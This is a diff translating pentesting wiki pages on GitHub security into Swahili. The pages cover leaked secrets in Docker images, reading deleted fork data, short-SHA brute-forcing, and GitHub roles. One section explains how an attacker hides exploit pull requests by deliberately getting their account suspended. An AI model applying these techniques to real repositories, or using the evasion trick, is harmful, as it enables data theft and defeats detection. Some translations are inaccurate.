+Mfano unaweza kupatikana katika ifuatayo inayoweza kupanuliwa:
Github Action Build & Push Docker Image
-
```yaml
[...]
- name: Set up Docker Buildx
- uses: docker/setup-buildx-action@v1
+uses: docker/setup-buildx-action@v1
- name: Login to GitHub Container Registry
- uses: docker/login-action@v1
- with:
- registry: ghcr.io
- username: ${{ github.repository_owner }}
- password: ${{ secrets.ACTIONS_TOKEN }}
+uses: docker/login-action@v1
+with:
+registry: ghcr.io
+username: ${{ github.repository_owner }}
+password: ${{ secrets.ACTIONS_TOKEN }}
- name: Add Github Token to Dockerfile to be able to download code
- run: |
- sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
+run: |
+sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
- name: Build and push
- uses: docker/build-push-action@v2
- with:
- context: .
- push: true
- tags: |
- ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
- ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
+uses: docker/build-push-action@v2
+with:
+context: .
+push: true
+tags: |
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
[...]
```
-
-As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**.
-
-A user with read permissions over the repo will then be able to download the Docker Image using a personal access token:
+Kama unavyoona katika msimbo uliopita, usajili wa Github unahifadhiwa katika **`ghcr.io`**.
+Mtumiaji mwenye ruhusa za kusoma juu ya repo basi ataweza kupakua Picha ya Docker akitumia tokeni ya ufikiaji wa kibinafsi:
```bash
echo $gh_token | docker login ghcr.io -u --password-stdin
docker pull ghcr.io//:
```
-
Then, the user could search for **leaked secrets in the Docker image layers:**
{{#ref}}
@@ -558,20 +530,20 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-m
### Sensitive info in Github Actions logs
-Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
+Hata kama **Github** inajaribu **kubaini thamani za siri** katika rekodi za hatua na **kuepuka kuonyesha** hizo, **data nyeti nyingine** ambazo zinaweza kuwa zimeundwa katika utekelezaji wa hatua hiyo hazitafichwa. Kwa mfano, JWT iliyosainiwa kwa thamani ya siri haitafichwa isipokuwa [imewekwa maalum](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
## Covering your Tracks
-(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **canāt delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR)
+(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Kwanza kabisa, PR yoyote iliyoinuliwa inaonekana wazi kwa umma katika Github na kwa akaunti ya lengo ya GitHub. Katika GitHub kwa kawaida, **hatuwezi kufuta PR ya mtandao**, lakini kuna mabadiliko. Kwa akaunti za Github ambazo zime **simamishwa** na Github, **PR zao zote zinafuta moja kwa moja** na kuondolewa kutoka mtandao. Hivyo ili kuficha shughuli zako unahitaji ama kupata **akaunti yako ya GitHub isimamishwe au kupata akaunti yako iwe na alama**. Hii it **ficha shughuli zako zote** kwenye GitHub kutoka mtandao (kimsingi kuondoa PR zako zote za unyakuzi)
-An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share āsome stuffā in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github.
+Shirika katika GitHub lina ufanisi mkubwa katika kuripoti akaunti kwa GitHub. Unachohitaji kufanya ni kushiriki "mambo fulani" katika Issue na watakikisha akaunti yako imesimamishwa ndani ya masaa 12 :p na hapo umepata, umefanya unyakuzi wako usionekane kwenye github.
> [!WARNING]
-> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
+> Njia pekee kwa shirika kugundua kuwa wamekuwa wakilengwa ni kuangalia rekodi za GitHub kutoka SIEM kwani kutoka UI ya GitHub PR itakuwa imeondolewa.
## Tools
-The following tools are useful to find Github Action workflows and even find vulnerable ones:
+Zana zifuatazo ni muhimu kupata Github Action workflows na hata kupata zile zenye udhaifu:
- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
@@ -579,7 +551,3 @@ The following tools are useful to find Github Action workflows and even find vul
- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
index ae156de2d..141152bd4 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
@@ -1,6 +1 @@
-# Gh Actions - Artifact Poisoning
-
-
-
-
-
+# Gh Actions - Upoisonaji wa Vitu vya Kazi
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
index 024aa5ff8..0abdb25c4 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
@@ -1,6 +1 @@
-# GH Actions - Cache Poisoning
-
-
-
-
-
+# GH Actions - Utoaji wa Sumaku
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
index 3cd632bd0..9cef507bc 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
@@ -1,6 +1 @@
# Gh Actions - Context Script Injections
-
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
index f19fa699e..025ffd279 100644
--- a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
+++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
@@ -2,59 +2,55 @@
{{#include ../../banners/hacktricks-training.md}}
-This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
+Njia hizi za kufikia data kutoka Github ambayo ilionekana kufutwa [**ziliripotiwa katika chapisho hili la blog**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
## Accessing Deleted Fork Data
-1. You fork a public repository
-2. You commit code to your fork
-3. You delete your fork
+1. Unafanya fork ya hifadhi ya umma
+2. Unafanya commit ya msimbo kwenye fork yako
+3. Unafuta fork yako
> [!CAUTION]
-> The data commited in the deleted fork is still accessible.
+> Data iliyofanywa commit katika fork iliyofutwa bado inapatikana.
## Accessing Deleted Repo Data
-1. You have a public repo on GitHub.
-2. A user forks your repo.
-3. You commit data after they fork it (and they never sync their fork with your updates).
-4. You delete the entire repo.
+1. Una hifadhi ya umma kwenye GitHub.
+2. Mtumiaji anafanya fork ya hifadhi yako.
+3. Unafanya commit ya data baada ya wao kuifanya fork (na hawajawahi kusawazisha fork yao na masasisho yako).
+4. Unafuta hifadhi nzima.
> [!CAUTION]
-> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
+> Hata kama umefuta hifadhi yako, mabadiliko yote yaliyofanywa kwenye hiyo bado yanapatikana kupitia forks.
## Accessing Private Repo Data
-1. You create a private repo that will eventually be made public.
-2. You create a private, internal version of that repo (via forking) and commit additional code for features that youāre not going to make public.
-3. You make your āupstreamā repository public and keep your fork private.
+1. Unaunda hifadhi ya kibinafsi ambayo hatimaye itafanywa kuwa ya umma.
+2. Unaunda toleo la kibinafsi, la ndani la hifadhi hiyo (kupitia forking) na kufanya commit ya msimbo wa ziada kwa vipengele ambavyo huenda usifanye kuwa ya umma.
+3. Unafanya hifadhi yako ya āupstreamā kuwa ya umma na kuweka fork yako kuwa ya kibinafsi.
> [!CAUTION]
-> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
+> Inawezekana kufikia data yote iliyosukumwa kwenye fork ya ndani katika kipindi kati ya kuundwa kwa fork ya ndani na toleo la umma lilipofanywa kuwa la umma.
## How to discover commits from deleted/hidden forks
-The same blog post propose 2 options:
+Chapisho sawa la blog linapendekeza chaguzi 2:
### Directly accessing the commit
-If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/`
+Ikiwa thamani ya ID ya commit (sha-1) inajulikana inawezekana kuifikia katika `https://github.com///commit/`
### Brute-forcing short SHA-1 values
-It's the same to access both of these:
+Ni sawa kufikia zote hizi mbili:
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
-And the latest one use a short sha-1 that is bruteforceable.
+Na ya hivi karibuni inatumia sha-1 fupi ambayo inaweza kufanywa brute force.
## References
- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md
index ae1365a0f..deff5d5d3 100644
--- a/src/pentesting-ci-cd/github-security/basic-github-information.md
+++ b/src/pentesting-ci-cd/github-security/basic-github-information.md
@@ -4,191 +4,185 @@
## Basic Structure
-The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
+Muundo wa msingi wa mazingira ya github ya **kampuni** kubwa ni kumiliki **enterprise** ambayo inamiliki **mashirika kadhaa** na kila moja yao inaweza kuwa na **hifadhi kadhaa** na **timu kadhaa**. Kampuni ndogo zinaweza kumiliki tu **shirika moja na hakuna enterprise**.
-From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**.
+Kwa mtazamo wa mtumiaji, **mtumiaji** anaweza kuwa **mwanachama** wa **mashirika na enterprises tofauti**. Ndani yao, mtumiaji anaweza kuwa na **mifumo tofauti ya enterprise, shirika na hifadhi**.
-Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles.
+Zaidi ya hayo, mtumiaji anaweza kuwa **sehemu ya timu tofauti** zikiwa na mifumo tofauti ya enterprise, shirika au hifadhi.
-And finally **repositories may have special protection mechanisms**.
+Na hatimaye, **hifadhi zinaweza kuwa na mifumo maalum ya ulinzi**.
## Privileges
### Enterprise Roles
-- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
-- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
+- **Mmiliki wa Enterprise**: Watu wenye jukumu hili wanaweza **kusimamia wasimamizi, kusimamia mashirika ndani ya enterprise, kusimamia mipangilio ya enterprise, kutekeleza sera katika mashirika**. Hata hivyo, hawawezi **kufikia mipangilio ya shirika au maudhui** isipokuwa wametengenezwa kuwa mmiliki wa shirika au kupewa ufikiaji wa moja kwa moja kwa hifadhi inayomilikiwa na shirika.
+- **Wajumbe wa Enterprise**: Wajumbe wa mashirika yanayomilikiwa na enterprise yako pia ni **wanachama wa enterprise** kiotomatiki.
### Organization Roles
-In an organisation users can have different roles:
+Katika shirika, watumiaji wanaweza kuwa na mifumo tofauti:
-- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
-- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
-- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
-- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
- - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
-- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
-- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
+- **Wamiliki wa Shirika**: Wamiliki wa shirika wana **ufikiaji kamili wa kiutawala kwa shirika lako**. Jukumu hili linapaswa kuwa na mipaka, lakini si chini ya watu wawili, katika shirika lako.
+- **Wajumbe wa Shirika**: Jukumu la **kawaida**, lisilo la kiutawala kwa **watu katika shirika** ni mwanachama wa shirika. Kwa kawaida, wajumbe wa shirika **wana idadi ya ruhusa**.
+- **Wasimamizi wa Malipo**: Wasimamizi wa malipo ni watumiaji wanaoweza **kusimamia mipangilio ya malipo kwa shirika lako**, kama vile taarifa za malipo.
+- **Wasimamizi wa Usalama**: Ni jukumu ambalo wamiliki wa shirika wanaweza kuteua kwa timu yoyote katika shirika. Wakati linapotumika, linawapa kila mwanachama wa timu ruhusa za **kusimamia tahadhari za usalama na mipangilio katika shirika lako, pamoja na ruhusa za kusoma kwa hifadhi zote** katika shirika.
+- Ikiwa shirika lako lina timu ya usalama, unaweza kutumia jukumu la msimamizi wa usalama kuwapa wanachama wa timu ufikiaji mdogo wanahitaji kwa shirika.
+- **Wasimamizi wa Github App**: Ili kuruhusu watumiaji wengine **kusimamia Github Apps zinazomilikiwa na shirika**, mmiliki anaweza kuwapa ruhusa za msimamizi wa Github App.
+- **Washirikishi wa Nje**: Mshirikishi wa nje ni mtu ambaye ana **ufikiaji wa hifadhi moja au zaidi za shirika lakini si mwanachama** wa shirika kwa wazi.
-You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
+Unaweza **kulinganisha ruhusa** za mifumo hii katika jedwali hili: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
### Members Privileges
-In _https://github.com/organizations/\/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**.
+Katika _https://github.com/organizations/\/settings/member_privileges_ unaweza kuona **ruhusa ambazo watumiaji watakuwa nazo kwa kuwa sehemu ya shirika**.
-The settings here configured will indicate the following permissions of members of the organisation:
+Mipangilio hapa iliyowekwa itaonyesha ruhusa zifuatazo za wanachama wa shirika:
-- Be admin, writer, reader or no permission over all the organisation repos.
-- If members can create private, internal or public repositories.
-- If forking of repositories is possible
-- If it's possible to invite outside collaborators
-- If public or private sites can be published
-- The permissions admins has over the repositories
-- If members can create new teams
+- Kuwa msimamizi, mwandishi, msomaji au hakuna ruhusa juu ya hifadhi zote za shirika.
+- Ikiwa wanachama wanaweza kuunda hifadhi za kibinafsi, za ndani au za umma.
+- Ikiwa kuiga hifadhi kunawezekana
+- Ikiwa inawezekana kuwalika washirikishi wa nje
+- Ikiwa tovuti za umma au za kibinafsi zinaweza kuchapishwa
+- Ruhusa ambazo wasimamizi wanazo juu ya hifadhi
+- Ikiwa wanachama wanaweza kuunda timu mpya
### Repository Roles
-By default repository roles are created:
+Kwa kawaida mifumo ya hifadhi huundwa:
-- **Read**: Recommended for **non-code contributors** who want to view or discuss your project
-- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
-- **Write**: Recommended for contributors who **actively push to your project**
-- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
-- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
+- **Soma**: Inapendekezwa kwa **wasaidizi wasio wa msimbo** wanaotaka kuona au kujadili mradi wako
+- **Triage**: Inapendekezwa kwa **wasaidizi wanaohitaji kusimamia masuala na ombi la kuvuta** bila ufikiaji wa kuandika
+- **Andika**: Inapendekezwa kwa wasaidizi ambao **wanasukuma kwa nguvu kwenye mradi wako**
+- **Simamisha**: Inapendekezwa kwa **wasimamizi wa mradi wanaohitaji kusimamia hifadhi** bila ufikiaji wa vitendo nyeti au vya kuharibu
+- **Msimamizi**: Inapendekezwa kwa watu wanaohitaji **ufikiaji kamili wa mradi**, ikiwa ni pamoja na vitendo nyeti na vya kuharibu kama kusimamia usalama au kufuta hifadhi
-You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
+Unaweza **kulinganisha ruhusa** za kila jukumu katika jedwali hili [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
-You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_
+Unaweza pia **kuunda mifumo yako mwenyewe** katika _https://github.com/organizations/\/settings/roles_
### Teams
-You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
+Unaweza **orodhesha timu zilizoundwa katika shirika** katika _https://github.com/orgs/\/teams_. Kumbuka kuwa ili kuona timu ambazo ni watoto wa timu nyingine unahitaji kufikia kila timu ya mzazi.
### Users
-The users of an organization can be **listed** in _https://github.com/orgs/\/people._
+Watumiaji wa shirika wanaweza **orodheshwa** katika _https://github.com/orgs/\/people._
-In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
+Katika taarifa za kila mtumiaji unaweza kuona **timu ambazo mtumiaji ni mwanachama wa**, na **hifadhi ambazo mtumiaji ana ufikiaji wa**.
## Github Authentication
-Github offers different ways to authenticate to your account and perform actions on your behalf.
+Github inatoa njia tofauti za kuthibitisha akaunti yako na kufanya vitendo kwa niaba yako.
### Web Access
-Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
+Kwa kufikia **github.com** unaweza kuingia kwa kutumia **jina lako la mtumiaji na nenosiri** (na **2FA huenda**).
### **SSH Keys**
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
+Unaweza kuunda akaunti yako na funguo moja au kadhaa za umma zinazoruhusu **funguo binafsi zinazohusiana kufanya vitendo kwa niaba yako.** [https://github.com/settings/keys](https://github.com/settings/keys)
#### **GPG Keys**
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
+Huwezi **kujifanya kuwa mtumiaji kwa funguo hizi** lakini ikiwa huzitumii inaweza kuwa inawezekana kwamba **unagundulika kwa kutuma commits bila saini**. Jifunze zaidi kuhusu [mode ya uangalizi hapa](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
### **Personal Access Tokens**
-You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
+Unaweza kuunda token za ufikiaji wa kibinafsi ili **kutoa ufikiaji wa programu kwa akaunti yako**. Wakati wa kuunda token ya ufikiaji wa kibinafsi, **mtumiaji** anahitaji **kueleza** **ruhusa** ambazo **token** itakuwa nazo. [https://github.com/settings/tokens](https://github.com/settings/tokens)
### Oauth Applications
-Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
+Programu za Oauth zinaweza kukuomba ruhusa **za kufikia sehemu ya taarifa zako za github au kujifanya kuwa wewe** ili kufanya vitendo fulani. Mfano wa kawaida wa kazi hii ni **kitufe cha kuingia na github** ambacho unaweza kukutana nacho katika baadhi ya majukwaa.
-- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
-- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
-- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
-- You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth_application_policy_
+- Unaweza **kuunda** programu zako za **Oauth** katika [https://github.com/settings/developers](https://github.com/settings/developers)
+- Unaweza kuona **programu za Oauth ambazo zina ufikiaji wa akaunti yako** katika [https://github.com/settings/applications](https://github.com/settings/applications)
+- Unaweza kuona **mipaka ambayo Oauth Apps zinaweza kuomba** katika [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
+- Unaweza kuona ufikiaji wa wahusika wengine wa programu katika **shirika** katika _https://github.com/organizations/\/settings/oauth_application_policy_
-Some **security recommendations**:
+Baadhi ya **mapendekezo ya usalama**:
-- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
-- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
-- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
-- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
+- **Programu ya OAuth** inapaswa kila wakati **kufanya kama mtumiaji aliyethibitishwa wa GitHub katika GitHub yote** (kwa mfano, wakati wa kutoa arifa za mtumiaji) na kwa ufikiaji tu wa mipaka iliyotajwa.
+- Programu ya OAuth inaweza kutumika kama mtoa kitambulisho kwa kuwezesha "Ingia na GitHub" kwa mtumiaji aliyethibitishwa.
+- **Usijenge** **Programu ya OAuth** ikiwa unataka programu yako ifanye kazi kwenye **hifadhi moja**. Kwa mipaka ya `repo`, Programu za OAuth zinaweza **kufanya kazi kwenye \_zote**\_\*\* za hifadhi za mtumiaji aliyethibitishwa\*\*.
+- **Usijenge** Programu ya OAuth ili kufanya kazi kama programu kwa **timu au kampuni** yako. Programu za OAuth zinathibitishwa kama **mtumiaji mmoja**, hivyo ikiwa mtu mmoja anaunda Programu ya OAuth kwa kampuni kutumia, na kisha anaondoka kampuni, hakuna mtu mwingine atakayekuwa na ufikiaji wake.
+- **Zaidi** katika [hapa](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
### Github Applications
-Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
+Programu za Github zinaweza kuomba ruhusa za **kufikia taarifa zako za github au kujifanya kuwa wewe** ili kufanya vitendo maalum juu ya rasilimali maalum. Katika Programu za Github unahitaji kueleza hifadhi ambazo programu itakuwa na ufikiaji.
-- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
-- The GitHub App should **connect to a personal account or an organisation**.
-- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
-- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
-- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
-- You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_
+- Ili kufunga Programu ya GitHub, lazima uwe **mmiliki wa shirika au uwe na ruhusa za msimamizi** katika hifadhi.
+- Programu ya GitHub inapaswa **kuunganishwa na akaunti binafsi au shirika**.
+- Unaweza kuunda programu yako mwenyewe ya Github katika [https://github.com/settings/apps](https://github.com/settings/apps)
+- Unaweza kuona **programu zote za Github ambazo zina ufikiaji wa akaunti yako** katika [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
+- Hizi ni **API Endpoints za Programu za Github** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Kulingana na ruhusa za Programu itakuwa na uwezo wa kufikia baadhi yao
+- Unaweza kuona programu zilizofungwa katika **shirika** katika _https://github.com/organizations/\/settings/installations_
-Some security recommendations:
+Baadhi ya mapendekezo ya usalama:
-- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
-- Make sure the GitHub App integrates with **specific repositories**.
-- The GitHub App should **connect to a personal account or an organisation**.
-- Don't expect the GitHub App to know and do everything a user can.
-- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
-- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
-- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
+- Programu ya GitHub inapaswa **kuchukua hatua bila ya mtumiaji** (isipokuwa programu inatumia [token ya mtumiaji-kwa-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests)). Ili kuweka token za ufikiaji wa mtumiaji-kwa-server kuwa salama zaidi, unaweza kutumia token za ufikiaji ambazo zitakoma baada ya masaa 8, na token ya upya ambayo inaweza kubadilishwa kwa token mpya ya ufikiaji. Kwa maelezo zaidi, angalia "[Kurefresh token za ufikiaji wa mtumiaji-kwa-server](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
+- Hakikisha Programu ya GitHub inajumuisha **hifadhi maalum**.
+- Programu ya GitHub inapaswa **kuunganishwa na akaunti binafsi au shirika**.
+- Usitarajie Programu ya GitHub ijue na kufanya kila kitu ambacho mtumiaji anaweza.
+- **Usitumie Programu ya GitHub ikiwa unahitaji tu huduma ya "Ingia na GitHub"**. Lakini Programu ya GitHub inaweza kutumia [mchakato wa utambulisho wa mtumiaji](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) kuingia kwa watumiaji _na_ kufanya mambo mengine.
+- Usijenge Programu ya GitHub ikiwa unataka _tu_ kufanya kazi kama mtumiaji wa GitHub na kufanya kila kitu ambacho mtumiaji huyo anaweza kufanya.
+- Ikiwa unatumia programu yako na GitHub Actions na unataka kubadilisha faili za workflow, lazima uthibitishe kwa niaba ya mtumiaji kwa token ya OAuth ambayo inajumuisha mipaka ya `workflow`. Mtumiaji lazima awe na ruhusa ya msimamizi au kuandika kwa hifadhi ambayo ina faili ya workflow. Kwa maelezo zaidi, angalia "[Kuelewa mipaka kwa programu za OAuth](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
+- **Zaidi** katika [hapa](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
### Github Actions
-This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
+Hii **si njia ya kuthibitisha katika github**, lakini **kitendo kibaya** cha Github kinaweza kupata **ufikiaji usioidhinishwa kwa github** na **kulingana** na **privileges** zilizotolewa kwa Kitendo kadhaa **shambulio tofauti** zinaweza kufanywa. Tazama hapa chini kwa maelezo zaidi.
## Git Actions
-Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
